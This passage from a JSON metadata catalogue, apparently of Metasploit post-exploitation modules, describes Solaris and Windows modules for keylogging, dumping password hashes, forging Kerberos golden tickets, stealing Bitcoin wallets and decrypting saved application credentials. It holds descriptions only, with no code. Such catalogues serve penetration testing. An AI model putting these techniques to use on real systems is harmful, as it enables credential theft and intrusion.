"URL-https://www.securityfocus.com/archive/1/468235",
"EDB-30021",
"BID-23915"
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-20 20:54:41 +0000",
"path": "/modules/post/solaris/escalate/srsexec_readline.rb",
"is_install_path": true,
"ref_name": "solaris/escalate/srsexec_readline",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/checkvm": {
"name": "Solaris Gather Virtual Environment Detection",
"full_name": "post/solaris/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Solaris Zone, VMWare, VirtualBox, Xen,\n and QEMU/KVM.",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/solaris/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "solaris/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/enum_packages": {
"name": "Solaris Gather Installed Packages",
"full_name": "post/solaris/gather/enum_packages",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate installed packages on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/solaris/gather/enum_packages.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_packages",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/enum_services": {
"name": "Solaris Gather Configured Services",
"full_name": "post/solaris/gather/enum_services",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to enumerate services on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/solaris/gather/enum_services.rb",
"is_install_path": true,
"ref_name": "solaris/gather/enum_services",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_solaris/gather/hashdump": {
"name": "Solaris Gather Dump Password Hashes for Solaris Systems",
"full_name": "post/solaris/gather/hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Solaris System",
"references": [
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-03-24 08:11:24 +0000",
"path": "/modules/post/solaris/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "solaris/gather/hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/capture/keylog_recorder": {
"name": "Windows Capture Keystroke Recorder",
"full_name": "post/windows/capture/keylog_recorder",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Josh Hale <jhale85446@gmail.com>"
],
"description": "This module can be used to capture keystrokes. To capture keystrokes when the session is running\n as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of\n Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the\n Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session\n to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon\n option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN\n option can be combined with the Winlogon CAPTURE_TYPE to force the user to enter their clear-text\n password. It is recommended to run this module as a job, otherwise it will tie up your framework user interface.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/capture/keylog_recorder.rb",
"is_install_path": true,
"ref_name": "windows/capture/keylog_recorder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/capture/lockout_keylogger": {
"name": "Windows Capture Winlogon Lockout Credential Keylogger",
"full_name": "post/windows/capture/lockout_keylogger",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>",
"cg"
],
"description": "This module migrates and logs Microsoft Windows user's passwords via\n Winlogon.exe using idle time and natural system changes to give a\n false sense of security to the user.",
"references": [
"URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/capture/lockout_keylogger.rb",
"is_install_path": true,
"ref_name": "windows/capture/lockout_keylogger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/droplnk": {
"name": "Windows Escalate SMB Icon LNK Dropper",
"full_name": "post/windows/escalate/droplnk",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"mubix <mubix@hak5.org>"
],
"description": "This module drops a shortcut (LNK file) that has an ICON reference\n existing on the specified remote host, causing SMB and WebDAV\n connections to be initiated from any user that views the shortcut.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/droplnk.rb",
"is_install_path": true,
"ref_name": "windows/escalate/droplnk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/getsystem": {
"name": "Windows Escalate Get System via Administrator",
"full_name": "post/windows/escalate/getsystem",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses the builtin 'getsystem' command to escalate\n the current session to the SYSTEM account from an administrator\n user account.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/getsystem.rb",
"is_install_path": true,
"ref_name": "windows/escalate/getsystem",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/golden_ticket": {
"name": "Windows Escalate Golden Ticket",
"full_name": "post/windows/escalate/golden_ticket",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will create a Golden Kerberos Ticket using the Mimikatz Kiwi Extension. If no\n options are applied it will attempt to identify the current domain, the domain administrator\n account, the target domain SID, and retrieve the krbtgt NTLM hash from the database. By default\n the well-known Administrator's groups 512, 513, 518, 519, and 520 will be applied to the ticket.",
"references": [
"URL-https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-06-27 15:36:41 +0000",
"path": "/modules/post/windows/escalate/golden_ticket.rb",
"is_install_path": true,
"ref_name": "windows/escalate/golden_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/ms10_073_kbdlayout": {
"name": "Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation",
"full_name": "post/windows/escalate/ms10_073_kbdlayout",
"rank": 300,
"disclosure_date": "2010-10-12",
"type": "post",
"author": [
"Ruben Santamarta",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits the keyboard layout vulnerability exploited by Stuxnet. When\n processing specially crafted keyboard layout files (DLLs), the Windows kernel fails\n to validate that an array index is within the bounds of the array. By loading\n a specially crafted keyboard layout, an attacker can execute code in Ring 0.",
"references": [
"OSVDB-68552",
"CVE-2010-2743",
"MSB-MS10-073",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1",
"EDB-15985"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-09 11:12:51 +0000",
"path": "/modules/post/windows/escalate/ms10_073_kbdlayout.rb",
"is_install_path": true,
"ref_name": "windows/escalate/ms10_073_kbdlayout",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/screen_unlock": {
"name": "Windows Escalate Locked Desktop Unlocker",
"full_name": "post/windows/escalate/screen_unlock",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"L4teral <l4teral[4t]gmail com>",
"Metlstorm"
],
"description": "This module unlocks a locked Windows desktop by patching\n the respective code inside the LSASS.exe process. This\n patching process can result in the target system hanging or\n even rebooting, so be careful when using this module on\n production systems.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/escalate/screen_unlock.rb",
"is_install_path": true,
"ref_name": "windows/escalate/screen_unlock",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/escalate/unmarshal_cmd_exec": {
"name": "Windows unmarshal post exploitation",
"full_name": "post/windows/escalate/unmarshal_cmd_exec",
"rank": 300,
"disclosure_date": "2018-08-05",
"type": "post",
"author": [
"Nicolas Joly",
"Matthias Kaiser",
"Sanjay Gondaliya",
"Pratik Shah <pratik@notsosecure.com>"
],
"description": "This module exploits a local privilege escalation bug which exists\n in Microsoft COM for Windows when it fails to properly handle serialized objects.",
"references": [
"CVE-2018-0824",
"URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824",
"URL-https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn",
"EDB-44906"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-10-23 17:15:34 +0000",
"path": "/modules/post/windows/escalate/unmarshal_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/escalate/unmarshal_cmd_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/ad_to_sqlite": {
"name": "AD Computer, Group and Recursive User Membership to Local SQLite DB",
"full_name": "post/windows/gather/ad_to_sqlite",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "This module will gather a list of AD groups, identify the users (taking into account recursion)\n and write this to a SQLite database for offline analysis and query using normal SQL syntax.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/ad_to_sqlite.rb",
"is_install_path": true,
"ref_name": "windows/gather/ad_to_sqlite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/arp_scanner": {
"name": "Windows Gather ARP Scanner",
"full_name": "post/windows/gather/arp_scanner",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will perform an ARP scan for a given IP range through a\n Meterpreter Session.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/arp_scanner.rb",
"is_install_path": true,
"ref_name": "windows/gather/arp_scanner",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/bitcoin_jacker": {
"name": "Windows Gather Bitcoin Wallet",
"full_name": "post/windows/gather/bitcoin_jacker",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"illwill <illwill@illmob.org>",
"todb <todb@metasploit.com>"
],
"description": "This module downloads any Bitcoin wallet files from the target\n system. It currently supports both the classic Satoshi wallet and the\n more recent Armory wallets. Note that Satoshi wallets tend to be\n unencrypted by default, while Armory wallets tend to be encrypted by default.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/bitcoin_jacker.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitcoin_jacker",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/bitlocker_fvek": {
"name": "Bitlocker Master Key (FVEK) Extraction",
"full_name": "post/windows/gather/bitlocker_fvek",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Danil Bazin <danil.bazin@hsc.fr>"
],
"description": "This module enumerates ways to decrypt a Bitlocker volume and, if a recovery key is stored locally\n or can be generated, dumps the Bitlocker master key (FVEK).",
"references": [
"URL-https://github.com/libyal/libbde/blob/master/documentation/BitLocker Drive Encryption (BDE) format.asciidoc",
"URL-http://www.hsc.fr/ressources/outils/dislocker/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-09 06:32:22 +0000",
"path": "/modules/post/windows/gather/bitlocker_fvek.rb",
"is_install_path": true,
"ref_name": "windows/gather/bitlocker_fvek",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/cachedump": {
"name": "Windows Gather Credential Cache Dump",
"full_name": "post/windows/gather/cachedump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maurizio Agazzini <inode@mediaservice.net>",
"mubix <mubix@hak5.org>"
],
"description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. The default setting on Windows is to store\n the last ten successful logins.",
"references": [
"URL-http://lab.mediaservice.net/code/cachedump.rb"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/cachedump.rb",
"is_install_path": true,
"ref_name": "windows/gather/cachedump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/checkvm": {
"name": "Windows Gather Virtual Environment Detection",
"full_name": "post/windows/gather/checkvm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>",
"Aaron Soto <aaron_soto@rapid7.com>"
],
"description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, Virtual PC,\n VirtualBox, Xen, and QEMU.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-01-17 16:41:21 +0000",
"path": "/modules/post/windows/gather/checkvm.rb",
"is_install_path": true,
"ref_name": "windows/gather/checkvm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/avira_password": {
"name": "Windows Gather Avira Password Extraction",
"full_name": "post/windows/gather/credentials/avira_password",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Robert Kugler / robertchrk"
],
"description": "This module extracts the weakly hashed password\n which is used to protect an Avira Antivirus (<= 15.0.17.273) installation.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/avira_password.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/avira_password",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/bulletproof_ftp": {
"name": "Windows Gather BulletProof FTP Client Saved Password Extraction",
"full_name": "post/windows/gather/credentials/bulletproof_ftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module extracts information from BulletProof FTP Bookmarks files and stores\n retrieved credentials in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/bulletproof_ftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/bulletproof_ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/coreftp": {
"name": "Windows Gather CoreFTP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/coreftp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved passwords from the CoreFTP FTP client. These\n passwords are stored in the registry. They are encrypted with AES-128-ECB.\n This module extracts and decrypts these passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/coreftp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/coreftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/credential_collector": {
"name": "Windows Gather Credential Collector",
"full_name": "post/windows/gather/credentials/credential_collector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"tebo <tebo@attackresearch.com>"
],
"description": "This module harvests credentials found on the host and stores them in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/credential_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/credential_collector",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/domain_hashdump": {
"name": "Windows Domain Controller Hashdump",
"full_name": "post/windows/gather/credentials/domain_hashdump",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. It saves all of the captured password\n hashes, including historical ones.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-15 14:06:36 +0000",
"path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/domain_hashdump",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/dynazip_log": {
"name": "Windows Gather DynaZIP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/dynazip_log",
"rank": 300,
"disclosure_date": "2001-03-27",
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module extracts clear text credentials from dynazip.log.\n The log file contains passwords used to encrypt compressed zip\n files in Microsoft Plus! 98 and Windows Me.",
"references": [
"CVE-2001-0152",
"MSB-MS01-019",
"PACKETSTORM-24543",
"URL-https://support.microsoft.com/en-us/kb/265131"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/dynazip_log.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dynazip_log",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/dyndns": {
"name": "Windows Gather DynDNS Client Password Extractor",
"full_name": "post/windows/gather/credentials/dyndns",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Shubham Dawra <shubham2dawra@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module extracts the username, password, and hosts for DynDNS version 4.1.8.\n This is done by downloading the config.dyndns file from the victim machine, and then\n automatically decoding the password field. The original copy of the config file is also\n saved to disk.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/dyndns.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/dyndns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_cred_store": {
"name": "Windows Gather Credential Store Enumeration and Decryption Module",
"full_name": "post/windows/gather/credentials/enum_cred_store",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Kx499"
],
"description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_cred_store",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_laps": {
"name": "Windows Gather Credentials Local Administrator Password Solution",
"full_name": "post/windows/gather/credentials/enum_laps",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_laps.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_laps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/enum_picasa_pwds": {
"name": "Windows Gather Google Picasa Password Extractor",
"full_name": "post/windows/gather/credentials/enum_picasa_pwds",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Unknown",
"Sil3ntDre4m <sil3ntdre4m@gmail.com>"
],
"description": "This module extracts and decrypts the login passwords\n stored by Google Picasa.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/enum_picasa_pwds.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_picasa_pwds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/epo_sql": {
"name": "Windows Gather McAfee ePO 4.6 Config SQL Credentials",
"full_name": "post/windows/gather/credentials/epo_sql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Nathan Einwechter <neinwechter@gmail.com>"
],
"description": "This module extracts connection details and decrypts the saved password for the\n SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a\n config file. They are encrypted with AES-128-ECB and a static key.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/epo_sql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/epo_sql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/filezilla_server": {
"name": "Windows Gather FileZilla FTP Server Credential Collection",
"full_name": "post/windows/gather/credentials/filezilla_server",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bannedit <bannedit@metasploit.com>",
"g0tmi1k"
],
"description": "This module will collect credentials from the FileZilla FTP server if installed.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/filezilla_server.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/filezilla_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/flashfxp": {
"name": "Windows Gather FlashFXP Saved Password Extraction",
"full_name": "post/windows/gather/credentials/flashfxp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It\n finds saved FTP connections in the Sites.dat file.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-17 16:00:04 +0000",
"path": "/modules/post/windows/gather/credentials/flashfxp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/flashfxp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/ftpnavigator": {
"name": "Windows Gather FTP Navigator Saved Password Extraction",
"full_name": "post/windows/gather/credentials/ftpnavigator",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/ftpnavigator.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpnavigator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/ftpx": {
"name": "Windows Gather FTP Explorer (FTPX) Credential Extraction",
"full_name": "post/windows/gather/credentials/ftpx",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module finds saved login credentials for the FTP Explorer (FTPx)\n FTP client for Windows.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/post/windows/gather/credentials/ftpx.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/ftpx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/gpp": {
"name": "Windows Gather Group Policy Preference Saved Passwords",
"full_name": "post/windows/gather/credentials/gpp",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Loic Jaquemet <loic.jaquemet+msf@gmail.com>",
"scriptmonkey <scriptmonkey@owobble.co.uk>",
"theLightCosine <theLightCosine@metasploit.com>",
"mubix <mubix@hak5.org>"
],
"description": "This module enumerates the victim machine's domain controller and\n connects to it via SMB. It then looks for Group Policy Preference XML\n files containing local user accounts and passwords and decrypts them\n using Microsoft's public AES key.\n\n Cached Group Policy files may be found on end-user devices if the group\n policy object is deleted rather than unlinked.\n\n Tested on WinXP SP3 Client and Win2k8 R2 DC.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)",
"URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html",
"URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx",
"URL-https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/",
"MSB-MS14-025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-09-10 15:04:22 +0000",
"path": "/modules/post/windows/gather/credentials/gpp.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/gpp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/heidisql": {
"name": "Windows Gather HeidiSQL Saved Password Extraction",
"full_name": "post/windows/gather/credentials/heidisql",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"h0ng10"
],
"description": "This module extracts saved passwords from the HeidiSQL client. These\n passwords are stored in the registry. They are encrypted with a custom algorithm.\n This module extracts and decrypts these passwords.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/heidisql.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/heidisql",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/idm": {
"name": "Windows Gather Internet Download Manager (IDM) Password Extractor",
"full_name": "post/windows/gather/credentials/idm",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"sil3ntdre4m <sil3ntdre4m@gmail.com>",
"Unknown"
],
"description": "This module recovers the saved premium download account passwords from\n Internet Download Manager (IDM). These passwords are stored in an encoded\n format in the registry. This module traverses through these registry entries\n and decodes them. Thanks to the template code of theLightCosine's CoreFTP\n password module.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/post/windows/gather/credentials/idm.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/idm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"post_windows/gather/credentials/imail": {
"name": "Windows Gather IPSwitch iMail User Data Enumeration",
"full_name": "post/windows/gather/credentials/imail",
